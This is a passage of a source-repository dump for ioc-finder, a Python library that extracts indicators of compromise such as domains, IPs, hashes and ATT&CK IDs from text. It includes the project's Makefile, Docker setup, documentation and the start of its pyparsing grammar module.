match.groups() 21 | print("%-20s %s" % (target, help)) 22 | endef 23 | export PRINT_HELP_PYSCRIPT 24 | BROWSER := python -c "$$BROWSER_PYSCRIPT" 25 | 26 | help: 27 | @python -c "$$PRINT_HELP_PYSCRIPT" < $(MAKEFILE_LIST) 28 | 29 | clean: clean-build clean-pyc clean-test ## remove all build, test, coverage and Python artifacts 30 | 31 | 32 | clean-build: ## remove build artifacts 33 | rm -fr build/ 34 | rm -fr dist/ 35 | rm -fr .eggs/ 36 | find . -name '*.egg-info' -exec rm -fr {} + 37 | find . -name '*.egg' -exec rm -f {} + 38 | 39 | clean-pyc: ## remove Python file artifacts 40 | find . -name '*.pyc' -exec rm -f {} + 41 | find . -name '*.pyo' -exec rm -f {} + 42 | find . -name '*~' -exec rm -f {} + 43 | find . -name '__pycache__' -exec rm -fr {} + 44 | 45 | clean-test: ## remove test and coverage artifacts 46 | rm -fr .tox/ 47 | rm -f .coverage 48 | rm -fr htmlcov/ 49 | 50 | lint: ## check style with flake8 51 | flake8 ioc_finder tests 52 | 53 | test: ## run tests quickly with the default Python 54 | py.test 55 | 56 | 57 | test-all: ## run tests on every Python version with tox 58 | tox 59 | 60 | coverage: ## check code coverage quickly with the default Python 61 | coverage run --source ioc_finder -m pytest 62 | 63 | coverage report -m 64 | coverage html 65 | $(BROWSER) htmlcov/index.html 66 | 67 | docs: ## generate Sphinx HTML documentation, including API docs 68 | rm -f docs/ioc_finder.rst 69 | rm -f docs/modules.rst 70 | sphinx-apidoc -o docs/ ioc_finder 71 | $(MAKE) -C docs clean 72 | $(MAKE) -C docs html 73 | $(BROWSER) docs/_build/html/index.html 74 | 75 | servedocs: docs ## compile the docs watching for changes 76 | watchmedo shell-command -p '*.rst' -c '$(MAKE) -C docs html' -R -D . 77 | 78 | release: clean ## package and upload a release 79 | python setup.py sdist upload 80 | python setup.py bdist_wheel upload 81 | 82 | dist: clean ## builds source and wheel package 83 | python setup.py sdist 84 | python setup.py bdist_wheel 85 | ls -l dist 86 | 87 | install: clean ## install the package to the active Python's site-packages 88 | python setup.py install 89 | 90 | upstream: ## set the upstream for the repository 91 | git remote set-upstream https://github.com/fhightower/ioc-finder.git 92 | 93 | init: ## install the development requirements with pip (related to python2.x) 94 | pip install -r requirements_dev.txt 95 | 96 | init3: ## install the development requirements with pip3 (related to python3.x) 97 | pip3 install -r requirements_dev.txt 98 | 99 | pypi: clean ## upload the code to pypi 100 | python3 setup.py sdist bdist_wheel 101 | python3 -m twine upload dist/* 102 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IOC Finder 2 | 3 | [![PyPi](https://img.shields.io/pypi/v/ioc_finder.svg)](https://pypi.python.org/pypi/ioc_finder) 4 | ![PyPI - Downloads](https://img.shields.io/pypi/dm/ioc-finder) 5 | [![CI](https://github.com/fhightower/ioc-finder/workflows/CI/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 6 | [![Lint](https://github.com/fhightower/ioc-finder/workflows/Lint/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 7 | [![codecov](https://codecov.io/gh/fhightower/ioc-finder/branch/master/graph/badge.svg)](https://codecov.io/gh/fhightower/ioc-finder) 8 | [![License: LGPL v3](https://img.shields.io/badge/License-LGPL%20v3-blue.svg)](https://choosealicense.com/licenses/lgpl-3.0/) 9 | [![live demo](https://img.shields.io/badge/live%20demo-%E2%86%92-green)](https://hightower.space/ioc-finder/) 10 | 11 | Parse [indicators of compromise](https://searchsecurity.techtarget.com/definition/Indicators-of-Compromise-IOC) (also known as "observables" or "network data" - e.g. urls, email addresses, etc) from text. 12 | 13 | 📖 [Documentation](https://hightower.space/ioc-finder) (it's interactive!) 14 | 15 | 💪 I'm looking for [sponsorship](https://github.com/sponsors/fhightower) for this project. 16 | I have a number of improvements and helpful features I'd like to add and would appreciate some support as I invest this time and focus. 17 | If you use this project for in a commercial capacity and/or find it useful, please consider [contributing](https://github.com/sponsors/fhightower) even a small amount. Thanks! 18 | 19 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.4' 2 | 3 | services: 4 | _base: 5 | &base 6 | build: 7 | dockerfile: Dockerfile 8 | context: . 9 | volumes: 10 | - ./:/code 11 | - ~/.gitconfig:/root/.gitconfig 12 | 13 | dev: 14 | <<: *base 15 | command: ipython 16 | 17 | mkdocs: 18 | <<: *base 19 | entrypoint: "mkdocs" 20 | ports: 21 | - "8000:8000" 22 | command: ["serve", "--dev-addr=0.0.0.0:8000"] 23 | 24 | bump-patch: 25 | <<: *base 26 | command: bumpversion patch 27 | 28 | bump-minor: 29 | <<: *base 30 | command: bumpversion minor 31 | 32 | bump-major: 33 | <<: *base 34 | command: bumpversion major 35 | 36 | test: 37 | <<: *base 38 | command: pytest 39 | 40 | test-benchmarks: 41 | <<: *base 42 | # the `-c "."` prevents pytest from using the config specified in the pyproject.toml (which we don't want to use for benchmarks) 43 | command: pytest -c "." --benchmark-storage=.benchmarks/Linux-CPython-3.10-64bit/ --benchmark-compare=0001 --benchmark-compare-fail=mean:10% --benchmark-columns='mean,median,stddev,iqr' tests/benchmarks.py 44 | 45 | update-benchmarks: 46 | <<: *base 47 | command: > 48 | bash -c " 49 | pytest -c '.' --benchmark-storage=.benchmarks/ --benchmark-save=benchmark tests/benchmarks.py && 50 | mv .benchmarks/Linux-CPython-3.10-64bit/0002_benchmark.json .benchmarks/Linux-CPython-3.10-64bit/0001_benchmark.json" 51 | 52 | lint: 53 | <<: *base 54 | entrypoint: ./docker/lint.sh 55 | environment: 56 | # this is used in ./docker/lint.sh to determine whether or not the lint step should fail if there files were... 57 | # changed by black/isort. You can change this value to "ci" to test how the lint step will run in... 58 | # the ci pipeline. 59 | CONTEXT: local 60 | -------------------------------------------------------------------------------- /docker/lint.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set -euxo pipefail 4 | 5 | echo "Running linters and formatters..." 6 | 7 | isort ioc_finder/ tests/ 8 | 9 | black ioc_finder/ tests/ 10 | 11 | # if the CONTEXT env var is "ci" (which is set in .github/workflows/lint.yml), validate that none of the files 12 | # have been changed by the previous lint steps 13 | if [ "${CONTEXT:-local}" = "ci" ]; then 14 | (git status | grep "nothing to commit") || { echo "Lint steps have changed files"; exit 1; }; 15 | fi 16 | 17 | mypy ioc_finder/ tests/ 18 | 19 | pylint --fail-under 9 ioc_finder/*.py 20 | 21 | flake8 ioc_finder/ 22 | 23 | echo "Done ✨ 🎉 ✨" 24 | 25 | -------------------------------------------------------------------------------- /docs/development.md: -------------------------------------------------------------------------------- 1 | # Development Guide 🐳 2 | 3 | This page shows you how to test, lint, and explore the ioc-finder. 4 | As always, if you have feedback, please [raise an issue](https://github.com/fhightower/ioc-finder/issues/new) and we'll be happy 5 | to improve our docs. Thanks! 6 | 7 | ## Prerequisites 8 | 9 | If you want to test, lint, or explore ioc-finder, make sure you have [docker][docker] and [docker-compose][docker-compose] installed (if you don't see: [installing docker][docker-install]). 10 | 11 | Then you can use the `test`, `lint`, and `dev` docker compose services listed below! 12 | 13 | ## Test ioc-finder 🧪 14 | 15 | To test ioc-finder, run the following command from the root directory of the project: 16 | 17 | ```shell 18 | docker-compose run --rm test 19 | ``` 20 | 21 | Typically, this command will run [pytest][pytest-link] on the project's test suite. To view the details of what this command does, take a look at the `test` service in the project's `docker-compose.yml` file. 22 | 23 | ### Understanding our Testing Framework 24 | 25 | There are two types of tests in the `ioc-finder/tests/` directory: 26 | 27 | 1. Standard tests in test_*.py files 28 | 2. Tests run by `ioc-finder/tests/test_find_iocs.py` 29 | 30 | In this section of the documentation, we'll discuss the second set of tests (those run by `ioc-finder/tests/test_find_iocs.py`). 31 | 32 | In the `ioc-finder/tests/find_iocs_cases` dir, there are files which define test cases with an input and expected output for different types of observables (a.k.a. indicators). 33 | 34 | A test case is a [`pytest.param`](https://docs.pytest.org/en/stable/reference/reference.html?highlight=The%20id%20to%20attribute%20to%20this%20parameter%20set#pytest.param) object 35 | that takes these arguments: 36 | 37 | - The input to the `ioc_finder.find_iocs` function (a string) 38 | - The expected output from the `ioc_finder.find_iocs` function (a dict) 39 | - (*Optional*) Kwargs for the `ioc_finder.find_iocs` function (a dict) 40 | - The `id` kwarg providing a name for the test (a string) 41 | 42 | An example looks like: 43 | 44 | ```python 45 | from pytest import param 46 | 47 | param('as1234', {'asns': ['ASN1234']}, {}, id="asn_1") 48 | ``` 49 | 50 | `ioc-finder/tests/test_find_iocs.py` collects data from the `ioc-finder/tests/find_iocs_cases/` dir and runs tests to make sure the `find_iocs` function returns the expected data. 51 | 52 | ## Lint ioc-finder 🧹 53 | 54 | To lint ioc-finder, run the following command from the root directory of the project: 55 | 56 | ```shell 57 | docker-compose run --rm lint 58 | ``` 59 | 60 | Typically, this command will run a number of linters on the project's code with the goal of improving code qality and catching bugs before they are released (you can read more about the benefits of linting [here][linting-intro]). To view the details of what this command does, take a look at the `lint` service in the project's `docker-compose.yml` file. 61 | 62 | ## Explore ioc-finder 🔭 63 | 64 | To explore ioc-finder, you can drop into a "dev" environment which is an [IPython][ipython] shell with the project and all its requirements loaded. To do this, run the following command from the root directory of the project: 65 | 66 | ```shell 67 | docker-compose run --rm dev 68 | ``` 69 | 70 | To see what this command does, take a look at the `dev` service in the project's `docker-compose.yml` file. 71 | 72 | ## Run Docs Locally 📖 73 | 74 | To view the docs for ioc-finder locally, run the following command from the root directory of the project: 75 | 76 | ```shell 77 | docker-compose run --rm mkdocs 78 | ``` 79 | 80 | This will serve the documentation at `http://localhost:8000`. 81 | 82 | # Questions? Please Ask! 83 | 84 | If you have any follow-up questions, don't hesitate to ask! It takes practice to understand how to contribute to open-source software, so there is no shame in asking for help. 85 | 86 | [pytest-link]: https://docs.pytest.org/en/stable/ 87 | [docker-compose]: https://docs.docker.com/compose/ 88 | [docker-install]: https://docs.docker.com/get-docker/ 89 | [docker]: https://www.docker.com/get-started 90 | [linting-intro]: https://dbader.org/blog/python-code-linting 91 | [ipython]: https://ipython.org/ 92 | 93 | -------------------------------------------------------------------------------- /docs/index.md: -------------------------------------------------------------------------------- 1 | # IOC Finder 2 | 3 | [![PyPi](https://img.shields.io/pypi/v/ioc_finder.svg)](https://pypi.python.org/pypi/ioc_finder) 4 | ![PyPI - Downloads](https://img.shields.io/pypi/dm/ioc-finder) 5 | [![CI](https://github.com/fhightower/ioc-finder/workflows/CI/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 6 | [![Lint](https://github.com/fhightower/ioc-finder/workflows/Lint/badge.svg)](https://github.com/fhightower/ioc-finder/actions) 7 | [![codecov](https://codecov.io/gh/fhightower/ioc-finder/branch/master/graph/badge.svg)](https://codecov.io/gh/fhightower/ioc-finder) 8 | [![License: LGPL v3](https://img.shields.io/badge/License-LGPL%20v3-blue.svg)](https://choosealicense.com/licenses/lgpl-3.0/) 9 | 10 | Welcome to the documentation for the `ioc-finder` library - a library to find different types of [indicators of compromise](https://digitalguardian.com/blog/what-are-indicators-compromise) (a.k.a observables) and data pertinent to indicators of compromise! 11 | 12 | 📢 *Announcement*: I'm looking for [sponsorship](https://github.com/sponsors/fhightower) for this project. I have a number of improvements and helpful features I'd like to add, but need some support to continue working on this project. If you use this project for work and/or find it useful, please consider [contributing](https://github.com/sponsors/fhightower) even a small amount. Thanks! 13 | 14 | ### Quick-Start 15 | 16 | Install ioc-finder: 17 | 18 | ```shell 19 | pip install ioc-finder 20 | ``` 21 | 22 | Use it: 23 | 24 | ```python 25 | from ioc_finder import find_iocs 26 | 27 | text = "" 28 | 29 | iocs = find_iocs(text) 30 | iocs['domains'] 31 | iocs['urls'] 32 | ``` 33 | 34 | ## Overview (INTERACTIVE!) 35 | 36 | Enter some text with IOCs here and click "Parse IOCs" to see how ioc-finder parses IOCs. Click "Reload" 37 | 38 | 41 | 42 | 43 |
44 |

 45 | 
 46 | The code above uses [Pyodide](https://pyodide.org/en/stable/index.html) to provide a Python3.9 runtime in the browser using [WebAssembly](https://webassembly.org/). Enjoy!
 47 | 
 48 | ## Capabilities
 49 | 
 50 | ??? info "Data types found by ioc-finder"
 51 | 
 52 |     - Autonomous System Numbers (ASNs) (in multiple formats such as `asn1234` and `as 1234`)
 53 |     - Bitcoin addresses (P2PKH, P2SH, and Bech32)
 54 |     - CIDR ranges (currently ipv4 ranges; ipv6 ranges coming soon)
 55 |     - CVEs (e.g. `CVE-2014-1234`)
 56 |     - Domain names (support for Unicode domain names (e.g. `ȩxample.com`) is coming soon)
 57 |     - Email addresses (both standard format (e.g. `test@example.com`) and an email with an IP address as the domain (e.g. `test@[192.168.0.1]`))
 58 |     - File hashes (md5, sha1, sha256, sha512, and [import hashes](https://www.fireeye.com/blog/threat-research/2014/01/ tracking-malware-import-hashing.html), and [authentihashes](http://msdn.microsoft.com/en-us/library/windows/hardware/gg463180.aspx))
 59 |     - File paths (*beta*)
 60 |     - Google Adsense Publisher IDs
 61 |     - Google Analytics Tracker IDs
 62 |     - IP address (IPv4 and IPv6)
 63 |     - MAC addresses (*beta*)
 64 |     - Monero (crypto-currency) addresses
 65 |     - Registry key paths (e.g. `"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows`)
 66 |     - SSDeep hashes (*beta*)
 67 |     - URLs (URLs with and without schemes)
 68 |     - User agents (*beta*)
 69 |     - XMPP addresses (basically, this captures email addresses whose domain names contain "jabber" or "xmpp")
 70 |     - MITRE ATT&CK data (see [more info](https://attack.mitre.org/))\*:
 71 |         - Pre-attack tactics and techniques (and [sub-techniques](https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b))
 72 |         - Enterprise mitigations, tactics, and techniques (and [sub-techniques](https://medium.com/mitre-attack/    attack-subs-what-you-need-to-know-99bce414ae0b))
 73 |         - Mobile mitigations, tactics, and techniques (and [sub-techniques](https://medium.com/mitre-attack/    attack-subs-what-you-need-to-know-99bce414ae0b))
 74 |     - [TLP labels](https://www.us-cert.gov/tlp)
 75 | 
 76 |     Have another data-type you would like ioc-finder to parse? [Raise an issue][issues_link] and we'll see what we can do!
 77 | 
 78 | ??? info "Configuration Options"
 79 | 
 80 |     This library also provides options to:
 81 | 
 82 |     - Parse domain name from a URL
 83 |     - Parse domain name from an email address
 84 |     - Parse IP address from a CIDR range
 85 |     - Parse URLs without a scheme (e.g. without `https://`)
 86 |     - Parse [import hashes](https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html) and [authentihashes](http://msdn.microsoft.com/en-us/library/windows/hardware/gg463180.aspx)
 87 | 
 88 | ??? info "Known Limitations"
 89 | 
 90 |     - When parsing **registry key paths**, this library will NOT properly parse a registry key path where the last section contains a space. For example, `\software\microsoft\windows\currentversion\explorer\advanced on` will be parsed as `\software\microsoft\windows\currentversion\explorer\advanced` (the space in the final section is removed).
 91 |     - The items listed above (in the "Capabilities" section) that are postceded by "(*beta*)" are not very robust and may still have major issues. Any feedback or issues related to these items are much appreciated.
 92 |     - When parsing **markdown**, if there is a domain name that is surrounded by underscores (which would make the domain name italic in some flavours of markdown - e.g. `_google.com_`), the domain will be parsed *including* the leading underscore (e.g. `_google.com_` would be parsed as `_google.com`).
 93 | 
 94 | ## Feedback
 95 | 
 96 | If you have any ideas to improve this package, please [raise an issue][issues_link]!
 97 | 
 98 | ## Other Helpful Projects
 99 | 
100 | You may also be interested in [https://github.com/ioc-fang/ioc_fanger](https://github.com/ioc-fang/ioc_fanger), a project to fang and defang indicators of compromise. For example,
101 | 
102 | defanging:
103 | 
104 | ```
105 | example.com => example[.]com
106 | https://example.com => hXXps://example[.]com
107 | ```
108 | 
109 | and fanging:
110 | 
111 | ```
112 | example[.]com => example.com
113 | example(.)com => example.com
114 | me AT example(.)com => me@example.com
115 | ```
116 | 
117 | ## Credits
118 | 
119 | This project uses the [ioc_fanger](https://github.com/ioc-fang/ioc_fanger) package to make sure that all indicators in the text are properly [fanged](https://ioc-fanger.hightower.space/).
120 | 
121 | This package was created with [Cookiecutter](https://github.com/audreyr/cookiecutter) and Floyd Hightower's [python-project-template](https://github.com/fhightower-templates/python-project-template) project template.
122 | 
123 | [issues_link]: https://github.com/fhightower/ioc-finder/issues
124 | 
125 | \* MITRE data is © 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. (View the MITRE data's [full license](https://github.com/mitre/cti/blob/master/LICENSE.txt))
126 | 


--------------------------------------------------------------------------------
/docs/overrides/main.html:
--------------------------------------------------------------------------------
 1 | {% extends "base.html" %}
 2 | 
 3 | {% block libs %}
 4 |     {{ super() }}
 5 | 
 6 |     
12 | 
13 |     
14 | 
15 |     
65 | {% endblock %}
66 | 


--------------------------------------------------------------------------------
/docs/quick-start.md:
--------------------------------------------------------------------------------
  1 | ## Installation
  2 | 
  3 | The recommended means of installation is using [pip](https://pypi.python.org/pypi/pip/):
  4 | 
  5 | `pip install ioc-finder`
  6 | 
  7 | Alternatively, you can install ioc-finder as follows:
  8 | 
  9 | ```shell
 10 | git clone git@github.com:fhightower/ioc-finder.git && cd ioc-finder;
 11 | python setup.py install --user;
 12 | ```
 13 | 
 14 | ## Usage
 15 | 
 16 | This package can be used in [python](#python) or via a [command-line interface](#command-line-interface).
 17 | 
 18 | ### Python
 19 | 
 20 | The primary function in this package is the `ioc_finder.find_iocs()` function. A simple usage looks like:
 21 | 
 22 | ```python
 23 | from ioc_finder import find_iocs
 24 | 
 25 | text = "This is just an example.com https://example.org/test/bingo.php"
 26 | iocs = find_iocs(text)
 27 | 
 28 | print('Domains: {}'.format(iocs['domains']))
 29 | print('URLs: {}'.format(iocs['urls']))
 30 | ```
 31 | 
 32 | #### Inputs
 33 | 
 34 | You must pass some text into the `find_iocs()` function as string (the iocs will be parsed from this text). You can also provide the options detailed below.
 35 | 
 36 | ##### Options
 37 | 
 38 | The `find_iocs` takes the following keywords (all of them default to `True`):
 39 | 
 40 | - `parse_domain_from_url` (default=True): Whether or not to parse domain names from URLs (e.g. `example.com` from `https://example.com/test`)
 41 | - `parse_from_url_path` (default=True): Whether or not to parse observables from URL paths (e.g. `2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862` from `https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection`)
 42 | - `parse_domain_from_email_address` (default=True): Whether or not to parse domain names from email addresses (e.g. `example.com` from `foo@example.com`)
 43 | - `parse_address_from_cidr` (default=True): Whether or not to parse IP addresses from CIDR ranges (e.g. `0.0.0.1` from `0.0.0.1/24`)
 44 | - `parse_urls_without_scheme` (default=True): Whether or not to parse URLs without a scheme (see [https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#Generic_syntax](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#Generic_syntax)) (e.g. `hightower.space/projects`)
 45 | - `parse_imphashes` (default=True): Parse [import hashes](https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html) (which look like md5s, but are preceded by 'imphash' or 'import hash')
 46 | - `parse_authentihashes` (default=True): Parse [authentihashes](http://msdn.microsoft.com/en-us/library/windows/hardware/gg463180.aspx) (which look like sha256s, but are preceded with 'authentihash')
 47 | 
 48 | See [test_ioc_finder.py](https://github.com/fhightower/ioc-finder/blob/master/tests/test_ioc_finder.py) for more examples.
 49 | 
 50 | #### Output
 51 | 
 52 | The `find_iocs()` returns a dictionary in the following structure:
 53 | 
 54 | ```json
 55 | {
 56 |     "asns": [],
 57 |     "attack_mitigations": {
 58 |         "enterprise": [],
 59 |         "mobile": []
 60 |     },
 61 |     "attack_tactics": {
 62 |         "enterprise": [],
 63 |         "mobile": [],
 64 |         "pre_attack": []
 65 |     },
 66 |     "attack_techniques": {
 67 |         "enterprise": [],
 68 |         "mobile": [],
 69 |         "pre_attack": []
 70 |     },
 71 |     "authentihashes": [],
 72 |     "bitcoin_addresses": [],
 73 |     "cves": [],
 74 |     "domains": [],
 75 |     "email_addresses": [],
 76 |     "email_addresses_complete": [],
 77 |     "file_paths": [],
 78 |     "google_adsense_publisher_ids": [],
 79 |     "google_analytics_tracker_ids": [],
 80 |     "imphashes": [],
 81 |     "ipv4_cidrs": [],
 82 |     "ipv4s": [],
 83 |     "ipv6s": [],
 84 |     "mac_addresses": [],
 85 |     "md5s": [],
 86 |     "monero_addresses": [],
 87 |     "registry_key_paths": [],
 88 |     "sha1s": [],
 89 |     "sha256s": [],
 90 |     "sha512s": [],
 91 |     "ssdeeps": [],
 92 |     "tlp_labels": [],
 93 |     "urls": [],
 94 |     "user_agents": [],
 95 |     "xmpp_addresses": []
 96 | }
 97 | 
 98 | ```
 99 | 
100 | For example, running the example code shown at the start of the [usage](#usage) section above produces the following output:
101 | 
102 | ```json
103 | {
104 |     "asns": [],
105 |     "attack_mitigations": {
106 |         "enterprise": [],
107 |         "mobile": []
108 |     },
109 |     "attack_tactics": {
110 |         "enterprise": [],
111 |         "mobile": [],
112 |         "pre_attack": []
113 |     },
114 |     "attack_techniques": {
115 |         "enterprise": [],
116 |         "mobile": [],
117 |         "pre_attack": []
118 |     },
119 |     "authentihashes": [],
120 |     "bitcoin_addresses": [],
121 |     "cves": [],
122 |     "domains": ["example.org", "example.com"],
123 |     "email_addresses": [],
124 |     "email_addresses_complete": [],
125 |     "file_paths": [],
126 |     "google_adsense_publisher_ids": [],
127 |     "google_analytics_tracker_ids": [],
128 |     "imphashes": [],
129 |     "ipv4_cidrs": [],
130 |     "ipv4s": [],
131 |     "ipv6s": [],
132 |     "mac_addresses": [],
133 |     "md5s": [],
134 |     "monero_addresses": [],
135 |     "registry_key_paths": [],
136 |     "sha1s": [],
137 |     "sha256s": [],
138 |     "sha512s": [],
139 |     "ssdeeps": [],
140 |     "tlp_labels": [],
141 |     "urls": ["https://example.org/test/bingo.php"],
142 |     "user_agents": [],
143 |     "xmpp_addresses": []
144 | }
145 | ```
146 | 
147 | ##### Output Details
148 | 
149 | There are two grammars for email addresses. There is a fairly complete grammar to find email addresses matching the spec (which is very broad). Any of these complete email addresses (e.g. `foo"bar@gmail.com`) will be sent as output to in `email_addresses_complete` key.
150 | 
151 | Email addresses in the simple form we are familiar with (e.g. `bar@gmail.com`) will be sent as output in the `email_addresses` key.
152 | 
153 | ### Parsing Specific Indicator Types
154 | 
155 | If you need to parse a specific indicator type, you can do this using one of the parse functions that start with `parse_`. For example, the code below will parse URLs:
156 | 
157 | ```python
158 | from ioc_finder import parse_urls
159 | 
160 | text = 'https://google.com'
161 | results = parse_urls(prepare_text(text))
162 | print(results)
163 | ```
164 | 
165 | If you use a parse function for a specific indicator type, we recommend that you first call the `prepare_text` function which [fangs](https://ioc-fanger.hightower.space/) (e.g. `hXXps://example[.]com` => `https://example.com`) the text before parsing indicators from it. In the future, more functionality will be added to the `prepare_text` function making it advantageous to call this function before parsing indicators.
166 | 
167 | ### Command-Line Interface
168 | 
169 | The ioc-finder package can be used from a command line like:
170 | 
171 | ```
172 | ioc-finder "This is just an example.com https://example.org/test/bingo.php"
173 | ```
174 | 
175 | This will return:
176 | 
177 | ```json
178 | {
179 |     "asns": [],
180 |     "attack_mitigations": {
181 |         "enterprise": [],
182 |         "mobile": []
183 |     },
184 |     "attack_tactics": {
185 |         "enterprise": [],
186 |         "mobile": [],
187 |         "pre_attack": []
188 |     },
189 |     "attack_techniques": {
190 |         "enterprise": [],
191 |         "mobile": [],
192 |         "pre_attack": []
193 |     },
194 |     "authentihashes": [],
195 |     "bitcoin_addresses": [],
196 |     "cves": [],
197 |     "domains": [
198 |         "example.com",
199 |         "example.org"
200 |     ],
201 |     "email_addresses": [],
202 |     "email_addresses_complete": [],
203 |     "file_paths": [],
204 |     "google_adsense_publisher_ids": [],
205 |     "google_analytics_tracker_ids": [],
206 |     "imphashes": [],
207 |     "ipv4_cidrs": [],
208 |     "ipv4s": [],
209 |     "ipv6s": [],
210 |     "mac_addresses": [],
211 |     "md5s": [],
212 |     "monero_addresses": [],
213 |     "registry_key_paths": [],
214 |     "sha1s": [],
215 |     "sha256s": [],
216 |     "sha512s": [],
217 |     "ssdeeps": [],
218 |     "tlp_labels": [],
219 |     "urls": [
220 |         "https://example.org/test/bingo.php"
221 |     ],
222 |     "user_agents": [],
223 |     "xmpp_addresses": []
224 | }
225 | ```
226 | 
227 | Here are the usage instructions for the CLI:
228 | 
229 | ```
230 | Usage: ioc-finder [OPTIONS] TEXT
231 | 
232 |   CLI interface for parsing indicators of compromise.
233 | 
234 | Options:
235 |   --no_url_domain_parsing         Using this flag will not parse domain names
236 |                                   from URLs
237 |   --no_email_addr_domain_parsing  Using this flag will not parse domain names
238 |                                   from email addresses
239 |   --no_cidr_address_parsing       Using this flag will not parse IP addresses
240 |                                   from CIDR ranges
241 |   --no_xmpp_addr_domain_parsing   Using this flag will not parse domain names
242 |                                   from XMPP addresses
243 |   --help                          Show this message and exit.
244 | ```
245 | 


--------------------------------------------------------------------------------
/ioc_finder/__init__.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | from .ioc_finder import (
 4 |     find_iocs,
 5 |     parse_asns,
 6 |     parse_authentihashes_,
 7 |     parse_bitcoin_addresses,
 8 |     parse_complete_email_addresses,
 9 |     parse_cves,
10 |     parse_domain_names,
11 |     parse_email_addresses,
12 |     parse_enterprise_attack_tactics,
13 |     parse_enterprise_attack_techniques,
14 |     parse_file_paths,
15 |     parse_google_adsense_ids,
16 |     parse_google_analytics_ids,
17 |     parse_imphashes_,
18 |     parse_ipv4_addresses,
19 |     parse_ipv4_cidrs,
20 |     parse_ipv6_addresses,
21 |     parse_mac_addresses,
22 |     parse_md5s,
23 |     parse_mobile_attack_tactics,
24 |     parse_mobile_attack_techniques,
25 |     parse_pre_attack_tactics,
26 |     parse_pre_attack_techniques,
27 |     parse_registry_key_paths,
28 |     parse_sha1s,
29 |     parse_sha256s,
30 |     parse_sha512s,
31 |     parse_ssdeeps,
32 |     parse_tlp_labels,
33 |     parse_urls,
34 |     parse_user_agents,
35 |     parse_xmpp_addresses,
36 |     prepare_text,
37 | )
38 | 
39 | __all__ = [
40 |     "find_iocs",
41 |     "parse_asns",
42 |     "parse_authentihashes_",
43 |     "parse_bitcoin_addresses",
44 |     "parse_complete_email_addresses",
45 |     "parse_cves",
46 |     "parse_domain_names",
47 |     "parse_email_addresses",
48 |     "parse_enterprise_attack_tactics",
49 |     "parse_enterprise_attack_techniques",
50 |     "parse_file_paths",
51 |     "parse_google_adsense_ids",
52 |     "parse_google_analytics_ids",
53 |     "parse_imphashes_",
54 |     "parse_ipv4_addresses",
55 |     "parse_ipv4_cidrs",
56 |     "parse_ipv6_addresses",
57 |     "parse_mac_addresses",
58 |     "parse_md5s",
59 |     "parse_mobile_attack_tactics",
60 |     "parse_mobile_attack_techniques",
61 |     "parse_pre_attack_tactics",
62 |     "parse_pre_attack_techniques",
63 |     "parse_registry_key_paths",
64 |     "parse_sha1s",
65 |     "parse_sha256s",
66 |     "parse_sha512s",
67 |     "parse_ssdeeps",
68 |     "parse_tlp_labels",
69 |     "parse_urls",
70 |     "parse_user_agents",
71 |     "parse_xmpp_addresses",
72 |     "prepare_text",
73 | ]
74 | 
75 | __author__ = """Floyd Hightower"""
76 | __version__ = "7.3.0"
77 | 


--------------------------------------------------------------------------------
/ioc_finder/ioc_grammars.py:
--------------------------------------------------------------------------------
  1 | import copy
  2 | import re
  3 | 
  4 | from pyparsing import (
  5 |     CaselessLiteral,
  6 |     Char,
  7 |     Combine,
  8 |     Empty,
  9 |     FollowedBy,
 10 |     Literal,
 11 |     MatchFirst,
 12 |     NotAny,
 13 |     OneOrMore,
 14 |     Optional,
 15 |     Or,
 16 |     Regex,
 17 |     Word,
 18 |     WordEnd,
 19 |     WordStart,
 20 |     ZeroOrMore,
 21 |     alphanums,
 22 |     alphas,
 23 |     hexnums,
 24 |     nums,
 25 |     one_of,
 26 |     printables,
 27 |     pyparsing_common,
 28 |     replace_with,
 29 | )
 30 | 
 31 | from ioc_finder.data import (
 32 |     enterprise_attack_mitigations,
 33 |     enterprise_attack_tactics,
 34 |     enterprise_attack_techniques,
 35 |     mobile_attack_mitigations,
 36 |     mobile_attack_tactics,
 37 |     mobile_attack_techniques,
 38 |     pre_attack_tactics,
 39 |     pre_attack_techniques,
 40 |     schemes,
 41 |     tlds,
 42 | )
 43 | 
 44 | alphanum_word_start = WordStart(wordChars=alphanums)
 45 | alphanum_word_end = WordEnd(wordChars=alphanums)
 46 | 
 47 | # the label definition ignores the fact that labels should not end in an hyphen
 48 | label = Word(initChars=alphanums + "_", bodyChars=alphanums + "-_", max=63)
 49 | domain_tld = one_of(tlds, caseless=True)
 50 | domain_name = (
 51 |     alphanum_word_start
 52 |     + Combine(
 53 |         Combine(OneOrMore(label + ("." + FollowedBy(Word(alphanums + "-_")))))("domain_labels") + domain_tld("tld")
 54 |     )
 55 |     + alphanum_word_end
 56 | ).set_parse_action(pyparsing_common.downcase_tokens)
 57 | 
 58 | ipv4_section = (
 59 |     Word(nums, asKeyword=True, max=3)
 60 |     .set_parse_action(lambda x: str(int(x[0])))
 61 |     .addCondition(lambda tokens: int(tokens[0]) < 256)
 62 | )
 63 | # basically, the grammar below says: start any words that start with a '.' or a number;
 64 | # I want to match words that start with a '.' because this will fail later in the grammar...
 65 | # and I do not want to match anything that start with a '.'
 66 | ipv4_address = (
 67 |     alphanum_word_start
 68 |     + WordStart("." + nums)
 69 |     + Combine((ipv4_section + ".") * 3 + ipv4_section)
 70 |     + NotAny(Regex(r"\.\S"))
 71 |     + alphanum_word_end
 72 | )
 73 | 
 74 | ipv6_word_start = WordStart(wordChars=alphanums + ":")
 75 | ipv6_word_end = WordEnd(wordChars=alphanums + ":")
 76 | 
